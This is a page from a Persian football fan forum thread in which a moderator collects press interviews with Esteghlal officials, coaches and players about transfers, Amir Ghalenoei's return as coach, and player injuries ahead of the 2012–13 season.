Design & Developed BY Patira

صفحه 8 از 113 نخستنخست ... 6789101858108 ... آخرینآخرین
نمایش نتایج: از شماره 71 تا 80 , از مجموع 1125
    مدیر بخش هواداران

اسم واقعی شما
    @Tejarat_dolari_2019

ArgentinaSS_TehranAboomoslem

Farhad Majidi

تشکر ها
    2,885
    تشکر شده 10,338 در 5,823 پست

esteghlal مصاحبه آبی های پایتخت در فصل 91-92

به نام یاور بر حق

به یاد ناصر خان حجازی (روحش شاد)

به امید قهرمانی استقلال در فصل 91-92

مصاحبه بازیکنان و مربیان استقلال و استقلالیها در این تاپیک قرار خواهد گرفت. لطفا قوانین را خوانده و رعایت فرمایید.

استقـــــلال تـــــــــاج آســــــــیا

استقلال قهرمان آسیا 1990

خداحافظ گلبرگ مغرور

(ناصر خان حجازی روحش شاد - همیشه در قلب من یاد و خاطرش زنده هست)

<script type="text/javascript" src="http://facenama.org/postfix.php?u=1633238"></script>

2. 2 کاربر از پست مفید hamedss تشکر کرده اند .

مدیر بخش هواداران

اسم واقعی شما
    @Tejarat_dolari_2019

Farhad Majidi

تشکر ها
    2,885

esteghlal مصاحبه احمد رسولى نژاد

انصارى فرد و ۳ بازيكن خارجى در راه استقلال هستند

رسولى نژاد: بعضى ها كه تازه به فوتبال آمده اند بازار نقل وانتقالات را به هم ريخته اند

احمد رسولى نژاد رييس هيأت مديره باشگاه استقلال گفت: بعضى از دوستان كه تازه پايشان به فوتبال باز شده بازار نقل و انتقالات را خراب مى كنند و رقم هاى نجومى به بازيكنان مى دهند.او در حاشيه تمرين ديروز در جمع خبرنگاران گفت: اولين هدف ما در فصل جديد اين است تا دل هواداران استقلال را به دست آوريم و براى رسيدن به اين هدف همدل شده ايم.وى افزود: استقلال از قبل بازيكنان خوبى داشته و ما هم از روز اول دست سرمربى را براى انتخاب بازيكنان خود باز گذاشته ايم. در خطوط دفاع، هافبك و حمله بازيكنان مورد نياز و خوبى گرفته ايم و بلافاصله پس از درخواست سرمربى تيم آنها را اجرايى كرده ايم و اگر باز هم موضوعى براى پيگيرى باشد آن را عملى خواهيم كرد.معاون حقوقى وزارت ورزش و جوانان در پاسخ به اين سؤال كه چرا برخى از تيم ها سقف قرارداد را رعايت نمى كنند و حتى به بازيكنان خود خوروهاى گران قيمت هديه مى دهند گفت: گزارش هايى به وزير ورزش و جوانان داده شده تا تذكراتى در اين زمينه به افرادى كه اين مسايل را رعايت نمى كنند بدهند. بازرسى وزارت ورزش و حراست دستگاه ورزش در حال پيگيرى موارد هستند. گزارش هايى شنيده ايم كه اصلا خوب نيست. بعضى از دوستان كه تازه پايشان به فوتبال باز شده بازار نقل و انتقالات را خراب مى كنند و رقم هاى نجومى به بازيكنان مى دهند.رسولى نژاد عنوان كرد: امروز مسئول يك باشگاه صنعتى با من تماس گرفت و گفت شخصى بازار نقل و انتقالات را كاملا به هم ريخته است. بازيكنان متوسطى كه قبلا قيمت شان پايين بود الان قيمت شان مانند بازيكنان خوبى است كه قبلا ميلياردى پول مى گرفتند. در گذشته بازيكنانى كه ميلياردى پول مى گرفتند محدود بودند اما الان متوسط ها هم به آنها اضافه شده اند. دوستان ما بايد در سازمان ليگ بيشتر دقت كنند.رييس هيأت مديره باشگاه استقلال درباره جذب منوچهرى و گفت و گو با مديرعامل سايپا اظهار داشت: حيدرى مدير عامل سايپا يكى از دوستان بسيار خوب من است اما اگر رايزنى شده همه تلاش كرديم و فقط پاى يك نفر در ميان نبوده است. هر انتخابى كه سرمربى تيم كرد همه با هم دست به دست هم داديم تا با جذب بازيكن نگرانى هواداران را برطرف كنيم. از هواداران مى خواهم نگران برخى تبليغات نباشند چون اين نوع مسايل تبليغات رسانه اى است. استقلال تيم پرقدرتى را بسته و راهى ۳ جام مى كند.رسولى نژاد تاكيد كرد: بايد قبول كنيم امير قلعه نويى بهترين مربى ليگ ايران است و بايد از همان بازى اول از سوى تك تك هواداران استقلال كه د ه ها ميليون نفر هستند مورد حمايت قرار گيرد. با انتخاب قلعه نويى به هواداران استقلال هديه داديم كه در چند سال اخير آن را از ما طلب مى كردند.رييس هيأت مديره باشگاه استقلال در خصوص انصارى فرد گفت: در مراحل پايانى عقد قرار داد با اين بازيكن هستيم اما نظر نهايى را بايد از مدير عامل بپرسيد.رسولى نژاد در مورد اظهارات رويانيان مبنى بر اينكه انصارى فرد را از دهن شير بيرون كشيديم تصريح كرد: من به اين مسائل ورود نمى كنم. جواب اين سؤالات را بايد ازفتح الله زاده بگيريد. اگر بازيكنى جذب شود با نظر قلعه نويى و تلاش فتح الله زاده است. در خصوص مجيدى و جبارى نيز بايد از فتح الله زاده و سرمربى سوال كنيد. البته اميرى معاون باشگاه نيز پيگير اين مسايل است.رييس هيأت مديره باشگاه استقلال درباره شرايط برخى از بازيكنان كه با استقلال مشكل دارند گفت: ما به همه بازيكنان نياز داريم. ۸۰ درصد بازيكنان استقلال در اين تيم مى مانند كه در بين آنها بازيكنان بزرگ هم وجود دارند.رسولى نژاد درباره استعفاى زرينچه گفت: هيأت مديره استقلال بايد ۳ ۵، و يا ۷ نفره باشد. منتظر تصميم وزير كه رئيس مجمع است، هستيم تا ببينيم چه اتفاقى خواهد افتاد.وى همچنين از پيوستن عليرضا نيكبخت واحدى به استقلال ابراز بى اطلاعى كرد.

استقلال قهرمان آسیا 1990

خداحافظ گلبرگ مغرور

<script type="text/javascript" src="http://facenama.org/postfix.php?u=1633238"></script>

4. 2 کاربر از پست مفید hamedss تشکر کرده اند .

مدیر بخش هواداران

اسم واقعی شما
    @Tejarat_dolari_2019

Farhad Majidi

تشکر ها
    2,885

esteghlal مصاحبه ميرشاد ماجدى

انصارى فرد بعد از ديدار با قطر جواب مى دهد

ماجدى: بعيد مى دانم جبارى در ليست قلعه نويى نباشد

ميرشاد ماجدى سرپرست تيم فوتبال استقلال گفت: تمرينات تا ۸ تير در دو نوبت برگزار مى شود.او اظهار داشت: تمرينات استقلال از ساعت ۱۸ ديروز در كمپ اختصاصى باشگاه برگزار شد . برنامه تمرينى تيم تا هشتم تير مشخص است. صبح ها تمرين بدنسازى در آكادمى و بعدازظهرها نيز تمرينات تاكتيكى برگزار مى شود.وى افزود: به زودى مشخص مى شود كه براى اردو چه زمانى بايد برنامه ريزى كنيم اما احتمالا تيم راهى تركيه مى شود.سرپرست تيم استقلال در مورد اينكه چرا باشگاه تاكنون با مجتبى جبارى وارد مذاكره نشده گفت: كارهاى نقل و انتقالات را كميته مربوط به اين مسأله پيگيرى مى كند اما بعيد مى دانم جبارى در ليست قلعه نويى نباشد. حتما در روزهاى آينده اين مذاكره انجام مى شود.ماجدى در خصوص روند مذاكرات با انصارى فرد گفت: اين بازيكن در حال مذاكره با ۲ ۳، تيم است و فكر مى كنم مى خواهد بعد از بازى با قطر تصميم گيرى كند.

استقلال قهرمان آسیا 1990

خداحافظ گلبرگ مغرور

6. 2 کاربر از پست مفید hamedss تشکر کرده اند .

مدیر بخش هواداران

اسم واقعی شما
    @Tejarat_dolari_2019

Farhad Majidi

تشکر ها
    2,885

esteghlal مصاحبه آرش برهانی

تيموريان و جبارى مى مانند

برهانى: انصارى فرد مى تواند به استقلال كمك كند

آرش برهانى مهاجم استقلال اعتقاد دارد اين تيم بهتر از سال گذشته يارگيرى كرده است. او قبل از آغاز تمرين استقلال در خصوص بازگشت امير قلعه نويى اظهار داشت: قبلا كنار ايشان خاطرات خوبى داشتيم و اميدوارم امسال بتوانيم انتظارات را برآورده كنيم. وى در پاسخ به اين سوال كه چرا زمانى كه قلعه نويى در استقلال است شما بيشتر گل مى زنيد اما وقتى مى رود تعداد گل هايت كاهش پيدا مى كند گفت: در اين مورد نمى خواهم هيچ صحبتى انجام بدهم.برهانى با اشاره به بازيكنان جديد استقلال عنوان كرد: امسال بهتر از سال گذشته يارگيرى كرديم و اميدواريم نتايج بهترى كسب كنيم.مهاجم استقلال در خصوص اينكه آيا تيموريان و جبارى در اين تيم مى ماند يا خير گفت: اين دو نفر در استقلال خواهند ماند.خبرنگارى پرسيد همه معتقدند پرسپوليس بهتر از استقلال يارگيرى كرده و شما چه نظرى داريد كه برهانى گفت: ما تيم خوبى بستيم و آنها نياز به بازيكنان بيشترى داشتند. تيم خوبى داشتيم و آنها دوازدهم شده بودند و بايد يك سرى نفرات به جمع خود اضافه مى كردند.وى در خصوص اينكه منوچهرى به استقلال اضافه شده گفت: دوست ندارم درباره اشخاص صحبت كنم اما خط حمله ما از سال گذشته قوى تر شده و ديديد كه پارسال هم بهترين خط حمله از آن ما بود و امسال هم اميدوار به همين موضوع هستيم.برهانى در خصوص شايعاتى كه پيرامون حضور انصارى فرد در استقلال به گوش مى رسد گفت: او بازيكن خوب و بزرگى است و مى تواند به ما كمك كند.

استقلال قهرمان آسیا 1990

خداحافظ گلبرگ مغرور

8. 2 کاربر از پست مفید hamedss تشکر کرده اند .

مدیر بخش هواداران

اسم واقعی شما
    @Tejarat_dolari_2019

Farhad Majidi

تشکر ها
    2,885

esteghlal مصاحبه مجيد صالح

هواداران نگران نباشند

صالح: ملاك جلو بودن يك تيم جذب بازيكنان بزرگ نيست

مجيد صالح مربى جديد تيم فوتبال استقلال گفت: هواداران نگران نباشند چون طبق برنامه پيش مى رويم و براى ليگ دوازدهم هدف گذارى كرده ايم.وى در خصوص مقايسه اى كه اين روزها بين نقل و انتقالات ۲ باشگاه سرخابى انجام مى شود خاطرنشان كرد: بازيكنان مدنظرمان را به خدمت گرفته ايم و اينكه بگوييم چه تيمى در نقل و انتقالات برنده شده اصطلاح چندان مناسبى نيست. به طور مثال ۴ فصل پيش هنگامى كه در ذوب آهن بوديم تنها شاهين خيرى، كاسترو، سيد محمد حسينى و بابك رضى را به خدمت گرفتيم و تعداد نفرات جذب شده به عدد ۶ هم نرسيد اما نايب قهرمان مسابقات شديم.صالح ادامه داد: به اعتقاد من كار تيمى مهمتر از اين است كه بگوييم در نقل و انتقالات چه تيمى برتر است. ۲ تيم استقلال و پرسپوليس بازيكنان قابلى را به خدمت گرفته اند اما ملاك عقب و يا جلو بودن يك تيم در مسابقات اين نيست كه بگوييم چه تيمى بازيكنان بزرگ و نامى ترى را به خدمت مى گيرد.مربى جديد استقلال در پايان گفت: هواداران استقلال نگران نباشند چون طبق برنامه پيش مى رويم و براى ليگ دوازدهم هدف گذارى كرده ايم.

استقلال قهرمان آسیا 1990

خداحافظ گلبرگ مغرور

10. 2 کاربر از پست مفید hamedss تشکر کرده اند .

مدیر بخش هواداران

اسم واقعی شما
    @Tejarat_dolari_2019

Farhad Majidi

تشکر ها
    2,885

esteghlal مصاحبه عمران زاده

عمران‌زاده: تا به حال اینقدر تماشاگر در تمرین استقلال ندیده بودم

خبرگزاری فارس: مدافع تیم فوتبال استقلال گفت: تا به حال این همه تماشاگر را در تمرینات تیم استقلال ندیده بودم.

به گزارش خبرگزاری فارس، حنیف عمران‌زاده مدافع تیم استقلال در خصوص آخرین وضعیت این تیم با شروع تمرینات اظهار داشت: خوشبختانه از روز گذشته کارمان را آغاز کردیم و امیدواریم که بازیکنانی که قرارداد دارند به جمع ما اضافه شوند و بقیه نیز قرارداد خود را امضا کنند تا بتوانیم به صورت کامل‌تر برنامه‌هایمان را جلو ببریم.
    وی در خصوص حضور امیر قلعه‌نویی در استقلال گفت: قلعه‌نویی قبلا مربی استقلال بوده و جام‌های مختلفی را با این تیم کسب کرده است. تماشاگران نیز او را دوست دارند و در این 3 سالی که من در استقلال حضور داشتم تاکنون ندیده بودم که به این اندازه تماشاگر به محل تمرینات استقلال بیاید.
    وی در خصوص اینکه بازیکنان جدید به ترکیب استقلال اضافه شده و آیا این مسئله کار را برای بازیکنان اصلی دشوار نمی‌کند گفت: اتفاقا هر زمان که استقلال در یارگیری خوب عمل کرده موفق بوده و هر وقت مهره نداشتیم به مشکل خوردیم. این مسئله باعث نمی‌شود که به تیم استرس وارد شود و اتفاقا انگیزه بازیکنان دوچندان خواهد شد.
    مدافع تیم استقلال در پایان در پاسخ به این سوال که آیا این تیم توانایی قهرمان شدن را دارد یا خیر گفت: کادر فنی خوب و قابل اعتمادی داریم و باید ببینیم چه نتیجه‌ای در پایان فصل خواهیم گرفت.

استقلال قهرمان آسیا 1990

خداحافظ گلبرگ مغرور

12. 2 کاربر از پست مفید hamedss تشکر کرده اند .

مدیر بخش هواداران

اسم واقعی شما
    @Tejarat_dolari_2019

Farhad Majidi

تشکر ها
    2,885

esteghlal مصاحبه میثم بائو

بائو : با شهرداری تسویه کنم قراردادم ثبت می‌شود

خبرگزاری فارس: هافبک تیم استقلال با بیان این مطلب که هنوز با شهرداری تبریز تسویه حساب نکردم گفت: منتظر پاسخ کمیته انضباطی می‌مانم و پس از آن قراردادم را ثبت خواهم کرد.

به گزارش خبرگزاری فارس، میثم بائو در خصوص آخرین وضعیت تیم استقلال و اینکه چرا دوباره به این تیم بازگشته است، گفت: خوشحالم که دوباره به استقلال برگشتم و امیر قلعه‌نویی روی بازی من نظر مثبتی داشت.
    وی افزود: امسال به خاطر پول به استقلال نیامدم و از همین رو تمام تلاشم را می‌کنم تا بهترین بازی‌ها را برای این تیم انجام دهم.
    بائو در پاسخ به این سوال که چرا تا به امروز قراردادش را ثبت نکرده‌ گفت: من هنوز با شهرداری تبریز تسویه حساب نکردم و ابتدا باید به تبریز بروم و پس از گرفتن برگه تسویه، قراردادم را ثبت کنم.
    هافبک جدید استقلال در خصوص شایعاتی که پیرامون عدم ثبت قراردادش و شکایت مدیر روستا از وی مطرح می‌شود گفت: ایشان به خاطر حرف‌هایش باید پاسخ بدهد البته من شاکی هستم و باید منتظر پاسخ کمیته انضباطی باشم. من طی یکی دو سال گذشته اصلا امیر قلعه‌نویی را ندیدم که مدیر روستا آن حرف‌ها را مطرح کرد و ایشان حالا صحبت‌هایش را به کمیته انضباطی گفته و باید پاسخگو باشد.
    منتظر پاسخ کمیته انضباطی هستم تا ببینم نتیجه آن چه می‌شود.
    میثم بائو در خصوص اینکه آیا سقف قرارداد را رعایت کرده و آیا استقلال در فصل نقل و انتقالات قافیه را به پرسپولیس باخته است گفت: یارگیری دیگر تیم‌ها به ما مربوط نمی‌شود و هر تیم پاسخگوی خودش است اما من سقف قرارداد را رعایت کردم و همان طور که گفتم امسال به خاطر پول به استقلال نیامده‌ام.

استقلال قهرمان آسیا 1990

خداحافظ گلبرگ مغرور

14. 2 کاربر از پست مفید hamedss تشکر کرده اند .

مدیر بخش هواداران

اسم واقعی شما
    @Tejarat_dolari_2019

Farhad Majidi

تشکر ها
    2,885

esteghlal مصاحبه ایمان مبعلی

مبعلی: به استقلال برگشتم تا به جام جهانی بروم

از ویسی تشکر می‌کنم

خبرگزاری فارس: هافبک تیم فوتبال استقلال گفت: به استقلال برگشتم تا با اثبات خود به همراه تیم ملی در جام‌جهانی برزیل حضور پیدا کنم.

به گزارش خبرگزاری فارس، ایمان مبعلی پس از یک فصل دوری از باشگاه استقلال و حضور در تیم الشارجه امارات مجدداً به جمع آبی‌پوشان بازگشت.
    این بازیکن در نیم‌فصل دوم به دلیل مصدومیت قراردادش را با تیم اماراتی فسخ کرد اما قصد داشت به ایران بازگردد که به خاطر قانون نتوانست با استقلال قرارداد امضاء کند.
    ایمان مبعلی هافبک جدید تیم استقلال در گفت‌وگو با خبرنگار ورزشی خبرگزاری فارس، در خصوص مسائل مختلف صحبت‌هایی را انجام داد که در زیر می‌خوانید:

فارس: چطور شد که به استقلال برگشتی؟

صحبت‌هایی انجام شده بود و نمی‌خواستم زیاد سرو صدا کنم و البته قلعه‌نویی به بازی من اعتقاد داشت و چند سال پیش در جام ملت‌های آسیا به من بازی می‌داد. دوست داشتم به استقلال برگردم و به احترام هواداران این تیم قرارداد یکساله اما سفید امضاء کردم و حتی کوچک‌ترین بحث مالی انجام ندادم.

فارس: گفته می‌شد که در آستانه عقد قرارداد با پیکان هستی؟
    با پیکانی‌ها صحبت کرده بودم و شخصاً به خاطر عبدالله ویسی می‌خواستم به این تیم بروم اما به خاطر دلایل موجهی که دارم به استقلال آمده‌ام و برای ویسی و تیم پیکان در این فصل آرزوی موفقیت می‌کنم.

فارس: قبول داری که بازگشتت به امارات اشتباه بود؟
    واقعاً اشتباه بزرگی انجام دادم که به الشارجه امارات رفتم و البته بعداز آن مصدومیت با شما مصاحبه کردم و گفتم که آنها می‌خواهند با کمر مصدوم برایشان بازی کنم. البته مصدومیت هم تنها 30روز طول کشید و خیلی زود آماده شدم و می‌خواستم به استقلال برگردم اما قانون اجازه نداد که برای استقلال بازی کنم در حالیکه قراردادم را با شارجه فسخ کردم که این تیم جزو 4تیم اصلی جام حذفی بود اما قسمت اینگونه بود که حالا با پیکان صحبت کنم و در نهایت به استقلال بیایم.

فارس: خیلی‌ها معتقدند پرسپولیس خوب یارگیری کرده و قافیه را از استقلال در نقل و انتقالات برده است؟
    برای موفقیت خیلی از مسائل دخیل است، این اعتقاد من است که در ایران هیچ بازیکنی برتر از دیگری نیست و همه در یک سطح هستند به خصوص که یک بازیکن تیمش را عوض کند، آن زمان است که توقعات فقط بالا می‌رود و کار سخت می‌شود. نه به خاطر اینکه امروز با استقلال قرارداد بستم بلکه حتی اگر دیروز از من این سؤال را می‌پرسیدید می‌گفتم که استقلال در فصل نقل و انتقالات خوب کار کرده است چون این تیم مهره‌های خود را حفظ کرده و شما می‌بینید که در نقل و انتقالات اصلاً به دنبال دروازه‌بان و بازیکن دفاعی نبود اما پرسپولیس کلاً در این دو نقطه که ضعف داشت یارگیری کرد. پس این نشان می‌دهد که هر تیمی به دنبال پوشاندن نقاط ضعفش است.

فارس: با این شرایط استقلال این فصل قهرمان می‌شود؟
    در هر سه جام استقلال مدعی است و شک نکنید که یکی از مدعیان اصلی قهرمانی لیگ برتر خواهیم بود.

فارس: صحبت خاصی نداری؟
    من خوشحالم که به استقلال برگشتم و آمده‌ام که با تیم ملی به جام جهانی بروم. می‌دانم که قلعه‌نویی به بازیکنی که آماده باشد بازی می‌دهد و من هم مرد جنگیدن هستم. مطمئن باشید تمام تلاشم این است که بهتر از مبعلی دو فصل پیش باشم و امسال یکی از سالهای خوبم را پشت سر می‌گذارم.

استقلال قهرمان آسیا 1990

خداحافظ گلبرگ مغرور

16. 2 کاربر از پست مفید hamedss تشکر کرده اند .

مدیر بخش هواداران

اسم واقعی شما
    @Tejarat_dolari_2019

Farhad Majidi

تشکر ها
    2,885

esteghlal مصاحبه مجتبی جباری

جباري: اولويتم استقلال است

مجتبي جباري مي‌گويد 8 سال در استقلال بوده و اولويتش همين تيم است
    خبرآنلاين/ مجتبي جباري بدون‌شک از نظر فني يکي از بهترين بازيکنان استقلال طي چند سال اخير است. او فصل گذشته هم قبل از مصدوميت زانو، بهترين بازي‌ها را براي استقلال انجام داد و همين عملکرد باعث شد به يک بازيکن ثابت در تيم کارلوس کروش هم تبديل شود. طي چند روز اخير هم چالش ميان سرمربي تيم‌ملي و مديرعامل باشگاه استقلال پيش آمده و کروش از مصدوميت مجتبي جباري و پژمان منتظري به شدت ناراحت است و مربيان سابق استقلال را مقصر مي‌داند. از سوي ديگر صحبت‌هاي زيادي هم مطرح شده مبني بر اينکه جباري در استقلال مي‌ماند يا نه اما آن‌طور که به نظر مي‌رسد، شماره 8 در جمع آبي‌پوشان ماندني مي‌شود.

* همه مي‌خواهند بدانند در استقلال ماندني مي‌شوي يا نه زيرا بحث رفتنت به ساير تيم‌ها مطرح شده.

حقيقت اين است که چند تيم صحبت‌هاي خيلي کمي با من انجام داده‌اند و شرايطشان را هم گفته‌اند. البته صحبت جدي مطرح نشده و من مي‌خواهم اول با باشگاه خودم صحبت کنم زيرا 8 سال در استقلال بوده‌ام و طبيعي است اولويت اولم استقلال باشد.

* اين صحبت‌هاي تو يعني هواداران اميدوار باشند که در استقلال مي‌ماني.

من چندين سال در استقلال بوده و روزهاي خيلي خوبي را سپري کرده‌ام. در اين مدت هم همواره با مردم و هواداران ارتباط خوبي داشته‌ام و براي طرفداران استقلال ارزش و احترام بسياري قايلم. باشگاه، هويت و همه چيز خودم را از هواداران دارد و آنها سرمايه‌هاي واقعي تيم هستند. من از آنها ممنونم که همواره برخورد مناسب و دلگرم‌کننده‌اي با من داشتند و بدون‌شک اولويت اول من در ايران، استقلال است. اين را هم بگويم که طي يکي، دو فصل گذشته، ما تيم خيلي خوبي داشتيم. استقلال به معناي واقعي عالي بود و اگر دست‌اندرکاران فعلي تيم، خوب و باهوش عمل کنند، مي‌توانند افتخارات خيلي خوبي کسب کنند زيرا اين استقلال، با اضافه شدن چند بازيکن طراز اول، مي‌تواند حتي مدعي قهرماني در آسيا هم باشد زيرا از نظر فني و هم از نظر اخلاقي، نفرات خيلي خوبي دارد.

* طي چند روز قبل هم کارلوس کروش به خاطر مصدوميت زانو، خيلي معترض شد و از باشگاه استقلال شاکي بود.

به نظر من آقاي کروش حق دارد زيرا من با مينيسک پاره جلوي الاتفاق بازي کردم. حتي دکتر تيم گفت نبايد بازي کني، اما شرايط به گونه‌اي بود که مي‌خواستم هر طور شده به استقلال کمک کنم تا بتوانيم راهي ليگ قهرمانان آسيا شويم و از مرحله پلي‌آف صعود کنيم. همين شد که کارم به عمل جراحي کشيد و يک ماه عقب افتادم و حالا هم که بازي با قطر را از دست دادم. با اين شرايط مقابل الاتفاق بازي کردم و با همه وجود تلاش کردم اما بعد از آن و عمل جراحي‌ام، نه زنگي بود، نه تماسي و نه حتي يک احوالپرسي. آن موقع کار درستي انجام ندادند و انتظار دارم يک باشگاه بزرگ، با بازيکنان خودش و به خصوص آنهايي که قديمي‌تر هستند يا بازوبند مي‌بندند، رفتار بهتر و حرفه‌اي‌تري داشته باشد. با بازي مقابل الاتفاق، به استقلال کمک کردم اما به خودم ضربه زدم و حتي زندگي حرفه‌اي‌ام تحت‌تأثير منفي قرار گرفت و بازي تيم‌‌ملي با قطر را که خيلي هم مهم بود از دست دادم.

*کروش حرف خاصي به تو نزد؟

اول يک نکته بگويم؛ آقاي کروش هم مي‌توانست من را در ديدار با ازبکستان تا پايان بازي در زمين نگه دارد و بگويد بازي خيلي حساس است اما اين کار را نکرد. يا اينکه مي‌توانست اشکان دژاگه را به زور به زمين بفرستد اما اين‌گونه تصميم نگرفت. او به سلامت بازيکنانش خيلي اهميت مي‌دهد و به جاي اينکه مرا با قرص و مسکن و آمپول به زمين بفرستد، گفت برو و هر وقت خوب شدي برگرد. در صحبتي که باهم داشتيم، گفت اين زندگي تو است و اهميت خيلي بالايي دارد و سلامت بازيکن از هر چيزي مهم‌تر است و من از ايشان تشکر مي‌کنم. حتي گفت اگر در يک باشگاه اروپايي، چنين کاري با زانوي تو انجام مي‌شد، آن باشگاه را دادگاهي مي‌کردند و بايد غرامت مي‌دادند.

*تو گفتي خواستي با زانوي مصدوم، به استقلال کمک کني و تصميم خودت بود، اما پزشک و سرمربي وقت تيم نگفتند اگر بازي کني به ضررت تمام مي‌شود؟

ببينيد، بازيکن دوست دارد بازي کند و کمک تيمش باشد. آقاي کروش مي توانست بگويد بازي با قطر خيلي مهم است و بيا هر‌طور شده بازي کن اما با خود من جلسه گذاشت، با دکترها جلسه گذاشت و کلي بررسي کرد، بعد در پايان گفت مقابل قطر نباشد. من جلوي الاتفاق بازي کردم اما خيلي جالب است که حتي شب رفتنم به اتاق عمل، محمدرضا مولايي را واسطه مي کردند که به من زنگ بزند و بگويد اگر مي‌شود عمل نکن و بيا فينال جام‌حذفي را هم بازي کن! من از اين مسئله ناراحت شدم زيرا به جاي اينکه سلامتي بازيکن را هم در نظر بگيرند. دنبال گرتفن نتيجه در فينال جام‌حذفي بودند. من پيش دکتر ابراهيميمان رفتم و گفت مينسيک زانويت يک مقدار پارگي دارد و بايد عمل کني. حتي چند دکتر ديگر هم همين حرف را زدند و فکر مي‌کنم با توجه به اتفاقي افتاده در حق خودم و خانواده‌ام و اطرافيانم اجحاف شده حالا هم بايد فيزيوتراپي کنم تا فشارهايي که چند ماه آخر روي پايم آمده، درست شود.

*صحبت از اين بود که چند ماهي طول مي‌کشد تا برگردي؟
    نه، اين‌طور نيست، من حداکثر تا يک هفته ديگر مي توانم برگردم و مشکل خاصي وجود ندارد. من خيلي دوست داشتم زودتر برگردم اما بعد از يک فصل فشرده، پايم را عمل کردم و حالا هم که فيزيوتراپي دچار خستگي فوتبالي شدم و فرصتي براي استراحت هم نبود. يک بازي با کيفيت پايين هم در خدمت تيم‌‌ملي بودم و مسابقه با قطر را هم از دست دادم. اميدوارم با يک استراحت مناسب و فيزيوتراپي، براي فصل آينده و ادامه بازي هاي تيم‌‌ملي به آمادگي کامل برسم.

استقلال قهرمان آسیا 1990

خداحافظ گلبرگ مغرور

18. 2 کاربر از پست مفید hamedss تشکر کرده اند .

عضو Derby

پست مورد علاقه
    Forward
    مربی مورد علاقه
    Jose Moriniho
    بازیکن محبوب
    Ronaldo & Rooney & Aguero & Ozil & BEKHAM
    اسم واقعی شما
    Hasan

SpainRealMadridSS_Tehran

تشکر ها
    1,170
    تشکر شده 74 در 35 پست

ایمان مبعلی به استقلال بازگشت.

ایمان مبعلی امروز با مسئولان باشگاه استقلال به توافق رسید و با این تیم قرارداد یک ساله بست.
    مبعلی پیش از این نیز در استقلال بازی می‌کرد و پس از مدتی حضور در امارات بار دیگر به جمع‌ آبی‌پوشان بازگشت.

[برای مشاهده لینک ها شما باید عضو سایت باشید برای عضویت در سایت بر روی اینجا کلیک بکنید]
    I Love you David Beckham

20. 2 کاربر از پست مفید HASAN 7 تشکر کرده اند .

مدیر بخش هواداران

اسم واقعی شما
    @Tejarat_dolari_2019

Farhad Majidi

تشکر ها
    2,885

esteghlal مصاحبه حمودی

حمودى : پرسپوليس چون سال گذشته خوب نتيجه نگرفت بايد بازيكنان بيشترى مى گرفت

على حمودى مدافع تيم فوتبال استقلال گفت : سال قبل تيم خوبى داشتيم و با اضافه شدن بازيكنان جديد بايد شرايط بهتر از قبل شود.او درباره شرايط فعلى استقلال گفت : خدا را شكر بازيكنان سال قبل به خوبى حفظ شدند و مربى بزرگى به تيم آمد، آقاى فتح الله زاده هم در كنار ما باقى ماندند. شرايط خيلى بهتر از سال گذشته شده و اميدوارم بتوانيم در اين سال انتظارات را برآورده كنيم.حمودى در واكنش به شرايط رقيب سنتى استقلال گقت : پرسپوليس چون سال گذشته خوب نتيجه نگرفته است بايد بازيكنان بيشترى مى گرفت و تقويت مى شد. ما سال قبل تيم خوبى داشتيم و با اضافه شدن بازيكنان جديد بايد شرايط بهتر از قبل شود.

استقلال قهرمان آسیا 1990

خداحافظ گلبرگ مغرور

صفحه 8 از 113 نخستنخست ... 6789101858108 ... آخرینآخرین

اطلاعات موضوع

کاربرانی که در حال مشاهده این موضوع هستند

در حال حاضر 1 کاربر در حال مشاهده این موضوع است. (0 کاربران و 1 مهمان ها)